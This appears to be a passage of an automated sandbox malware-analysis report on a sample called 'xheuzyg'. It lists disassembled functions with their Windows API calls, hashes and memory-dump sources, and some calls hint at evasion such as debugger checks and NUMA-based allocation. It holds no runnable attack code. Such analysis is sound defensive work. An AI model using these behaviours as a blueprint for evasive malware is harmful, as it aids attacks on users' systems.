Y$Y$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\xl\worksheets\sheet1.xml$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$path_for_modified_xlsx.xlsx$path_to_your_xlsx_file.xlsx$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$temp_unzipped$tglweuhzjposb$u$u$u$u$u$u$u$u$u$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~
API String ID: 3670331875-3070636792
Opcode ID: 27cac773499105e9f57853fb87188759e947981e41935455e073382453142eda
Instruction ID: 80b196e3301c6f617ef10eb5312a62a60fe3387fd49c80abea5c15f15eedbe69
Opcode Fuzzy Hash: 27cac773499105e9f57853fb87188759e947981e41935455e073382453142eda
Instruction Fuzzy Hash: 95244910D0CBEAC8DB32C27C5C487CDAE611B63329F4843D991ED2A6D2C7B50B95DB66

Uniqueness

Uniqueness Score: -1.00%

Function 013808B7 Relevance: 6.4, APIs: 4, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: a0f02da3e88e78e9f3bee9ec7e8fc8e01b4821cd0a3fab6beeb177d081184f1a
Instruction ID: 01b55f6f9a38f90b5a1353d42211703c146bacec4fc3da8d8cc3c125dd21992d
Opcode Fuzzy Hash: a0f02da3e88e78e9f3bee9ec7e8fc8e01b4821cd0a3fab6beeb177d081184f1a
Instruction Fuzzy Hash: 49F1A520D5D2D9ADDF06DBE994507FCBFB09F26201F0841DAE4E4F6282C17A834E9B25

Uniqueness

Uniqueness Score: -1.00%

Function 013807DA Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?), ref: 013807F7

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
Instruction ID: 0778448e94a8de39ef5547028cb319713c51cbf3171b9ee1fc22c8e3782efd5f
Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
Instruction Fuzzy Hash: FDF0A7B1D1420CAFDB0CF7FC88456BE7BACDB08104F104669F606E2640D534858542A0

Uniqueness

Uniqueness Score: -1.00%

Function 01380D85 Relevance: 10.7, APIs: 7, Instructions: 194
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,0138161B,7FAB7E30), ref: 01380E4B
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040), ref: 01380E75
ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000), ref: 01380E8C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040), ref: 01380EAE
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040,?,00000000,0000000E), ref: 01380F20
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040,?), ref: 01380F2B
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040,?), ref: 01380F76

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: f8b5799f5dd2d69402dcff38aee1976536b354bb491624ba7028a71fd7e17a97
Instruction ID: f41a711a2d5bb8aeb547367d175489bdf53d56b1e8fcde756e7863384e4ad41a
Opcode Fuzzy Hash: f8b5799f5dd2d69402dcff38aee1976536b354bb491624ba7028a71fd7e17a97
Instruction Fuzzy Hash: F0519071E00319BBDB24AFB8CC44BAEBBB8AF58714F148515FA50F7280E7749909CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0138020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 01380244

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: d19940695f3dc53bddc8cdb7fb4c3e46727acefbf61e7478bc49b2156eacc16d
Instruction ID: 94ead1f5096cee48b7482135ea87d2de9020621bc929153c16688d48383fd114
Opcode Fuzzy Hash: d19940695f3dc53bddc8cdb7fb4c3e46727acefbf61e7478bc49b2156eacc16d
Instruction Fuzzy Hash: E102C270A00209EFEF19EF98C985BADBBB5FF04309F204159F515BA2A1D7749A89CF14

Uniqueness

Uniqueness Score: -1.00%

Function 001BB71D Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001BB769
GetFileType.KERNELBASE(00000000), ref: 001BB77B

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 687b68b0299bc9c1a98b398f768042cb58a094e639a6c0be116bf3ed83c4a331
Instruction ID: 2dd8750c2055cbabab0686d5041c43986b24948a754aeed50a7cd9dbff0d103d
Opcode Fuzzy Hash: 687b68b0299bc9c1a98b398f768042cb58a094e639a6c0be116bf3ed83c4a331
Instruction Fuzzy Hash: B311E67120C7418AC7344E3E8CD86A2BA95ABD2374B39071AE5B7C7DF1CBB4D881D641

Uniqueness

Uniqueness Score: -1.00%

Function 001B6C2B Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,001BB51A,00000001,00000364,?,00000006,000000FF,?,?,001B6099,001A105D), ref: 001B6C6C

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54bd6c7b0d7c57a6d507b3225dae6d5a130011a0cb479c800454cd26365da090
Instruction ID: 3231b7baea20508b96d0d64dcfff182878d4582d4a6409f88769f2431be035f2
Opcode Fuzzy Hash: 54bd6c7b0d7c57a6d507b3225dae6d5a130011a0cb479c800454cd26365da090
Instruction Fuzzy Hash: D6F0E932545524A79B265B72DC45AFA3F59EF707B0B154121F9599B180CF2CEC0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 01380838 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013807DA: GetSystemInfo.KERNELBASE(?), ref: 013807F7

VirtualAllocExNuma.KERNELBASE(00000000), ref: 0138089D

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID: AllocInfoNumaSystemVirtual
String ID:
API String ID: 449148690-0
Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
Instruction ID: fbe4a1958e7ea984b0799c6c81ed8de01eb3160b27ccf339132957a8a2f3eee1
Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
Instruction Fuzzy Hash: 4AF051F0D4530ABFFF287BF88C0976D7A78DF10309F1045557A40761C5DA79464D8AA5

Uniqueness

Uniqueness Score: -1.00%

Function 001B7330 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0cd737ffd6d20a4bd16e1c3cbd68f72814143a8ab185831b9d79bb7dc8a35822
Instruction ID: 60103000558a564206b78184aa9eaaa8d715f0d8ac8c2f32ba0b95148270af33
Opcode Fuzzy Hash: 0cd737ffd6d20a4bd16e1c3cbd68f72814143a8ab185831b9d79bb7dc8a35822
Instruction Fuzzy Hash: 47E06D3118D6659BEB212A769C01BDE7ADABFD17A0F2A0121FC15966E0DF64DC00A1E2

Uniqueness

Uniqueness Score: -1.00%

Function 001B681A Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a0e6626dbd8905454c10d86f140f4a87109f9d7f05eced4796c2c8eda7c0eff0
Instruction ID: d375983a62566002f2e1c3ecd3b4423dbfb9d175e283e82c02b7f9f4efddef21
Opcode Fuzzy Hash: a0e6626dbd8905454c10d86f140f4a87109f9d7f05eced4796c2c8eda7c0eff0
Instruction Fuzzy Hash: C5E0863654D128A7872115565C04FEB7BDDFBC1BB0F670111FD16576F08B51DC41A1D1

Uniqueness

Uniqueness Score: -1.00%

Function 0138073A Relevance: 1.3, APIs: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 01380777

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
Instruction ID: 33c317521052cb29d83b0cac8dee54413c61e015468bcf64d01069dd5ae60584
Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
Instruction Fuzzy Hash: AF111C70D00219AFEB04EFA8CC49BEEBBF4EB04308F208495F915B7291D2754A45CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001C460F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

GetACP.KERNEL32(?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C46CE
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?), ref: 001C4705
_wcschr.LIBVCRUNTIME ref: 001C4799
_wcschr.LIBVCRUNTIME ref: 001C47A7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001C4868

Strings

utf8, xrefs: 001C47D7

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
Instruction ID: 3ca7cc7612a48fa441ff2a2edc9f9ba9b83d50b93bb95deff0bdf729e83ae363
Opcode Fuzzy Hash: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
Instruction Fuzzy Hash: 13712671A08316ABEB24AB74DC96FBA77A8EF36700F10002EF905D7581EB70E8408765

Uniqueness

Uniqueness Score: -1.00%

Function 001C4DA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E41
GetLocaleInfoW.KERNEL32(?,20001004,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E6A
GetACP.KERNEL32(?,?,001C50BA,?,00000000), ref: 001C4E7F

Strings

OCP, xrefs: 001C4DFC
ACP, xrefs: 001C4DC6

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
Instruction ID: 372c589dae2ca2b249808fadc79c536c7dc7af20cb88cb604923d92b30488d34
Opcode Fuzzy Hash: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
Instruction Fuzzy Hash: 8021A132608100ABEB359F95C910FA773AABF74B64B57852CE90AD7100F736DD40C350

Uniqueness

Uniqueness Score: -1.00%

Function 001C4F84 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001C508C
IsValidCodePage.KERNEL32(00000000), ref: 001C50CA
IsValidLocale.KERNEL32(?,00000001), ref: 001C50DD
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001C5125
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001C5140

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
Instruction ID: 3457eff7ff3d6594573aa57ba62f1ba06467932f9225949b564e12e7be191145
Opcode Fuzzy Hash: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
Instruction Fuzzy Hash: 81516C71A04609ABDB10DBA5CC85FAF77B9FF28700F58046DF901E7191DB70E9948BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C4A2C Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4A80
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4ACA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4B90

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 50793565e79f581b1c30e6a6e01ef0b69f70f006d1fada66d501ca8651306a90
Instruction ID: ca7899b18f061a2525ca1bfad19facb65ae17df03397441b8a1fda77c3e713c3
Opcode Fuzzy Hash: 50793565e79f581b1c30e6a6e01ef0b69f70f006d1fada66d501ca8651306a90
Instruction Fuzzy Hash: 9561AE719092079FEB289F28CCA2FBA77A8FF64300F10816EE915C6595E774ED80DB54

Uniqueness

Uniqueness Score: -1.00%

Function 001B5909 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001B5A01
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001B5A0B
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001B5A18

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 080df7c8afd644e228c02c713ab0cf368dd76f6940a9d9f54a7e0adb20213c99
Instruction ID: 2826a0b478059bf68be51b02bf32ef3daa11c03606800bcd6e9319244608bf6f
Opcode Fuzzy Hash: 080df7c8afd644e228c02c713ab0cf368dd76f6940a9d9f54a7e0adb20213c99
Instruction Fuzzy Hash: BF31C27490122DABCB21DF68DC89BDDBBB8BF18314F5042EAE41CA7251E7709B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 001B0A2C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001B0A45

Strings

, xrefs: 001B0BAC

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: 58e3928ec433567425cd7e1a26de1c86c1e2e5432f6d1136f74a6d4ecad97774
Instruction ID: 8a1529b64933a33bca567bb0de076ce85bee6fe353c3d4829afdb6172ecab7f5
Opcode Fuzzy Hash: 58e3928ec433567425cd7e1a26de1c86c1e2e5432f6d1136f74a6d4ecad97774
Instruction Fuzzy Hash: 5C519AB2D06209CFEB25CFA9DA856AEBBF4FB08314F14806AD415EB254D774A940CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001C4C7F Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4CD3

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
